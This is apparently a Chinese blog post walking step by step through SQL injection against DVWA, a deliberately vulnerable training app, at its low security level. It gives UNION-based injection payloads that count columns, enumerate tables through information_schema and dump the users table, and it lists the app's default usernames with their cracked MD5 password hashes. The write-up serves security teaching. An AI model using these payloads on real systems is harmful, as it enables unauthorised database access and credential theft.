DVWA之“SQL注入”

作者: 求余的小屋 | 来源:发表于2019-08-13 22:21 被阅读1次
正常页面

判断注入类型

正常输入数字查询信息,下图为为输入3时,显示的信息。

UserID=3

数字后面,加上单引号测试

http://www.dvwa.com/vulnerabilities/sqli/?id=1'&Submit=Submit#

得到报错,不过还不能确定是字符型,还是数字型注入。

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1''' at line 1

去掉 id=1 后的 “单引号” 继续用布尔值测试

布尔值

①:?id=1 and 1=1&Submit=Submit#

②:?id=1 and 1=2&Submit=Submit#

在正常的查询语句后,加上"and 1=1""and 1=2"后,页面仍然正常显示,并正常查询出了用户基本信息。

布尔值判断

如果是数字型注入,id=1 后拼接 “and 1=2”后, 页面应该显示异常,或者有报错信息。

所以,基本确定,这是一个字符型注入,注入的语句,要采用闭合单引号方法,使之带入后端查询。

判断当前页面,读取表的字段数量

①:'+order by 3--+

②:'+order by 4--+

order by 2:页面正常

页面正常

order by 3:页面异常,报错

order by判断字段数

确认信息在当前页面,显示的位置

'+union select 1,2--+

确认回显位置

'+union select database(),version()--+

获取数据库名称、版本

读取当前页面,使用的数据库、表

'+union+select table_schema,table_name
from+information_schema.tables
where+table_schema=database()--+

获取dvwa下的表

读取users表的所有字段

'+union select table_name,column_name
from information_schema.columns
where table_schema=database() and table_name='users'--+

获取users表内的字段

我们看到了 “user”,“password” 字段,这两列里面,包含的内容这就是我们得目标了。

接下来就要从users表中,读取这两个字段得内容了。

读取用户名和密码

' union select user,password from dvwa.users--+

读取字段内的信息

密码被加密保存,目测(滑稽)md5加密

解密md5,得到登陆密码

admin:5f4dcc3b5aa765d61d8327deb882cf99(password)

gordonb:e99a18c428cb38d5f260853678922e03(abc123)

1337:8d3533d75ae2c3966d7e0d4fcc69216b(charley)

pablo:0d107d09f5bbe40cade3de5c71e9e9b7(letmein)

smithy:5f4dcc3b5aa765d61d8327deb882cf99(password)

总结

  • 先看传输参数,是用的HTTP协议中的,那种传输方式
  • 再判断是字符型还是数字型的注入,选择闭合或者其他方法,保证语句生效
  • 确定网站页面信息的回显位置
  • 构建SQL查询语句
  • "+" 和 空格效果一样,但是在cookie注入时,用"+"代替空格

相关文章

  • DVWA之“SQL注入”

    漏洞类型:SQL注入/Get 字符型 安全级别:Low 目标:通过注入SQL语句,获取 MySql 数据库存放的用...

  • DVWA-SQL Injection(SQL注入)

    本系列文集:DVWA学习笔记 SQL注入,是指攻击者通过注入恶意的SQL命令,破坏SQL查询语句的结构,从而达到执...

  • 07.DVWA之SQL注入

    漏洞概述 SQL注入是指应用程序中数据与操作未作分离,导致将攻击者提交的恶意数据拼写到SQL语句中当作代码执行从而...

  • 【DVWA】SQL注入篇

    0x01 Low SQL Injection 最简单的注入,没有任何过滤,常规语句注入即可: SQL Inject...

  • DVWA初级SQL注入

    配置好dvwa,进行SQL注入 直接输入 ID=1' 网站会报错,猜测后台 id='input' ,用1' ...

  • 一步一步学习 Web 安全 2.3 SQL 注入 dvwa 简单

    前面了解了 SQL 注入原理和步骤,现在来简单的上手体验一下。 如果还没有搭建 dvwa 的话移步 DVWA 的安...

  • 小迪16期-20170226

    第二天:Sql注入集锦篇 1.Sql注入之access注入 2.Sql注入之mysql注入 3.Sql注入之mss...

  • MySQL 注入笔记

    靶场环境:dvwa , 安全等级 low 判断存在SQL注入 提交'报错id=1 和 id =1 and 1=1 ...

  • DVWA十大漏洞之<01>SQL注入演练(low)

    1、设置把安全等级先调整为low,让自己获得点信心,免得一来就被打脸。DVWA之SQL注入演练(low) 2、测试...

  • PHP代码安全之SQL注入

    PHP代码安全之SQL注入 1、什么是SQL注入? SQL攻击(英语:SQL injection),简称注入攻击,...

网友评论

    本文标题:DVWA之“SQL注入”

    本文链接:https://www.haomeiwen.com/subject/bgpijctx.html